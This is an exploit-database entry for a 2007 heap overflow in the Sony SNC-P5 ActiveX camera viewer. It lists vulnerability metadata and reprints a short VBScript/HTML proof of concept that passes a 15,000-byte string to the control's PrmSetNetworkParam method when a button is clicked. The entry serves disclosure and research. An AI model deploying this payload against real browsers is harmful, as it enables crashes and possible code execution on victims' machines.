header-logo
Suggest Exploit
vendor:
Sony Network Camera SNC-P5
by:
/str0ke (milw0rm.com)
7.5
CVSS
HIGH
Heap Overflow
CWE
Product Name: Sony Network Camera SNC-P5
Affected Version From: SNC-P5 v1.0
Affected Version To: SNC-P5 v1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC

This is a proof-of-concept exploit for a heap overflow vulnerability in the Sony Network Camera SNC-P5 v1.0 ActiveX viewer. By clicking the 'Click Me' button, an attacker can trigger the vulnerability and potentially execute arbitrary code on the target system. This vulnerability was discovered by /str0ke and was published on milw0rm.com on June 27, 2007.

Mitigation:

There is no known mitigation for this vulnerability.
Source

Exploit-DB raw data:

<!--
Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC

Camera info
http://bssc.sel.sony.com/BroadcastandBusiness/DisplayModel?id=79540

SNC-P5 External API documentation
http://www.tracor-europe.info/racine/sony/PROG/P5/API/Documents/SNC-P5APIDocument1.0EN.pdf

/str0ke ! milw0rm.com 
-->

<script language = 'vbscript'>
Sub tryMe()
  buff = String(15000, "A")
  viewer.PrmSetNetworkParam buff, 1
End Sub
</script>

<OBJECT CLASSID="CLSID:5CB430A9-CAAC-4C91-AF61-6D410EEE1221" id="viewer"> </OBJECT>

<input language=VBScript onclick=tryMe() type=button value="Click Me">

# milw0rm.com [2007-06-27]

Navigation

Suggest Exploit

Services By CQR